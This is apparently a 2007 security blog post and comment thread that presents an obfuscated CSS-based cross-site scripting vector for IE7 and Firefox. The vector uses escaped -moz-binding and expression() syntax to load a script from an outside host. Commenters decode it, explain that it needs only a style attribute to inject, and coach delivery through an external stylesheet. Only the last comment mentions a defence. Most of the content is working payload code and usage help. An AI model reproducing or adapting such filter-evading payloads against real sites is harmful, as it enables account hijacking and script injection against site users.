Ultimate XSS CSS injection
Monday, 26 November 2007
Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles.
Credits update
The expression part of this technique was first demonstrated by Dan on the slackers forums, nice one Dan sorry about missing you from the credits.
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);xx: e\
xp\re\s\s\
i\o\n((win
dow.r!=1) 
? eval('x=
String.fro
mCharCode;
scr=docume
nt.createE
lement(x(1
15,99,114,
105,112,11
6));scr.se
tAttribute
(x(115,114
,99),x(104
,116,116,1
12,58,47,4
7,98,117,1
15,105,110
,101,115,1
15,105,110
,102,111,4
6,99,111,4
6,117,107,
47,108,97,
98,115,47,
120,115,11
5,47,120,1
15,115,46,
106,115));
document.g
etElementB
yId(x( 105
,110,106,1
01,99,116 
)).appendC
hild(scr);
window.r=1
;') : 1);" id="inject">test</div>
Please use my tool Hackvertor if you need to decode the IE vector as it will provide you with all the necessary conversions. Please note the vector has been broke up onto multiple lines for viewing purposes, please remove the line breaks when testing the vector.
No. 1 — November 26th, 2007 at 3:59 pm
here are the sources
xx: e\xp\re\s\s\i\o\n((window.r!=1) ? val(‘x=String.fromCharCode;
scr=document.createElement(x(115,99,114,105,112,116));
scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,98,117,115,105,110,101,115,115,105,110,102,111,46,99,111,46,117,107,47,108,97,98,115,47,120,115,115,47,120,115,115,46,106,115));
document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);
window.r=1;’)
n1
No. 2 — November 26th, 2007 at 4:21 pm
Hackvertor can now reconstruct this attack using the tag XSS->mozbindingexpression
and even add the backslashes for you
Filter evasion->backslashesc
No. 3 — November 26th, 2007 at 9:32 pm
Very interesting,
another great Job Gareth !!
No. 4 — November 28th, 2007 at 7:09 am
wow!
very nice work 🙂
No. 5 — December 2nd, 2007 at 10:45 am
how do you use this code for xss ?
Eliena
No. 6 — December 2nd, 2007 at 10:48 am
You need to remove the line breaks and the code requires an id=”inject” to work on IE7. It can be injected within most HTML tags using the style attribute.
No. 7 — December 3rd, 2007 at 12:22 am
So, its main advantage is on sites that filter “script” tags. You still need to pass “<” and “>” right?
No. 8 — December 3rd, 2007 at 6:42 am
Nope you don’t need “<” or “>” to use this injection, you just need a style attribute to inject.
No. 9 — December 10th, 2007 at 10:53 pm
Many thanks for the credit for the window.r trick. I hope I didn’t sound like I was specifically asking for credit on slackers- I was just trying to find out If I had come across the same trick as someone else or if it was an original idea. Nonetheless, I really appreciate the mention!
An damn, is that fine or what?! Nice work with that injection. A beautiful thing…
-Dan
No. 10 — December 11th, 2007 at 6:48 am
Hey Dan no probs you contributed to the above vector so you deserve credit 🙂
No. 11 — January 11th, 2008 at 4:35 pm
<script>alert(“test”)</script>
No. 12 — January 11th, 2008 at 5:38 pm
@l0ad1ng_x
LOL!
No. 13 — January 16th, 2008 at 8:29 pm
Can you please show us the source of this xss before it was “hackvectoreted”. I guess that’s here there but I just don’t find any way to reverse it.
Thanks
PS. Nice work you guys
No. 14 — January 16th, 2008 at 8:30 pm
Found some interesting thing here regarding this matter: hxxp://www.seo-blackhat.com/xss-cheat-sheet/
No. 15 — January 16th, 2008 at 8:32 pm
Sorry for the mess but don’t know to edit my post | guess that’s HEX there but I just don’t find any way to reverse it. |*
No. 16 — January 17th, 2008 at 12:13 am
@no.connexion
Hackvertor can also decode data you know 😉
I’ve decoded it for you can provide the code so you can enter you’re own:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PGRpdiBzdHlsZT0iXC1cbW9celwtYlxpXG5kXGluXGc6XHVybCgvL2J1c2luZXNzXGlcbmZvLmNvLnVrXC9sYWJzXC94YmxcL3hibFwueG1sXCN4c3MpOzxAaGV4X2VudD54eDogZVx4cFxyZVxzXHNcaVxvXG4oKHdpbmRvdy5yIT0xKSA%2FIGV2YWwoJ3g9U3RyaW5nLmZyb21DaGFyQ29kZTtzY3I9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCh4KDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTtzY3Iuc2V0QXR0cmlidXRlKHgoMTE1LDExNCw5OSkseCg8QHRvY2hhcmNvZGVzPmh0dHA6Ly9idXNpbmVzc2luZm8uY28udWsvbGFicy94c3MveHNzLmpzPEAvdG9jaGFyY29kZXM%2BKSk7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoeCggMTA1LDExMCwxMDYsMTAxLDk5LDExNiApKS5hcHBlbmRDaGlsZChzY3IpO3dpbmRvdy5yPTE7Jyk8QC9oZXhfZW50PiA6IDEpOyIgaWQ9ImluamVjdCI%2BdGVzdDwvZGl2Pg%3D%3D
Hackvertor also has XSS tags which allow you to construct this vector, goto Hackvertor->XSS->mozbindingexpression
No. 17 — January 18th, 2008 at 2:33 am
Thanks for answer. Is it possible to use this XSS through a css file? What I’ve tryed to do is to insert <link href=”hxxp://wwwexample.com/css/xss.css”> and then <div class=”somename” style=”” id=”inject”>test</div> in html and the xss.css should look like <<< .sometext {
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);x&#…1;') : 1);
} >>>
or maybe something like that: body {
background-image: url(‘javascript:alert(“XSS”);’)
}
None of the above worked … maybe I doing smthing wrong way or it’s just not going to work.
No. 18 — January 18th, 2008 at 9:17 am
@no.connexion
Yeah it’s possible to use it through a CSS file. In the file you need to define the rule as :-
body {
//code here
}
Then simply insert as a normal CSS through link or @import
No. 19 — January 18th, 2008 at 2:50 pm
Thanks for response.
Here are my final thoughts.
Added in html the following:
…
<style type=”text/css”>
@import url(http://www.example.com/css/test.css);
</style>
</head>
<body>
<b> This IS a test </b>
</body>
…
and the in test.css:
…
b
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);<@hex_ent>xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(‘x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(<@tocharcodes>http://businessinfo.co.uk/labs/xss/xss.js<@/tocharcodes>));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;’)<@/hex_ent> : 1);
}
…
OR
in test.css
b
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27) : 1);
}
AND it works fine for Firefox but IE70 does nothing. I’m using 7.0.5730.13.
No. 20 — January 18th, 2008 at 3:30 pm
@no.connexion
Dude you need to run “convert” in Hackvertor first before adding it to the page.
No. 21 — January 18th, 2008 at 3:55 pm
I guess I was using the converted version in my css here:
b
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27) : 1);
}
I didn’t use all the converted code for obvious reasons. Can you please confirm that you’ve done this through css and it works ? If yes I’ll stop asking and I’ll work my ass to make this work.
No. 22 — January 18th, 2008 at 3:57 pm
Yep tested on IE and Firefox
No. 23 — January 20th, 2008 at 3:02 am
Please take a look in here:
hxxp://noconnexion.wordpress.com/
No. 24 — September 2nd, 2008 at 4:59 am
coo000lllL :::::::: good work
No. 25 — October 9th, 2008 at 7:16 pm
Firefox 3 fixed this xml hole?
No. 26 — October 9th, 2008 at 8:03 pm
Yeah it’s fixed in FF3 final, I think the beta it was still in but they removed it 🙁
I thought it was possible to do it inline but Giorgio mentioned it’s only available in chrome 🙁
No. 27 — January 13th, 2010 at 4:43 am
how can you stop people from writing these type of attacks to a css file when allowing people to write there own css files on your server?
No. 28 — January 13th, 2010 at 1:23 pm
@sim
Validate the CSS using a CSS parser like anti-samy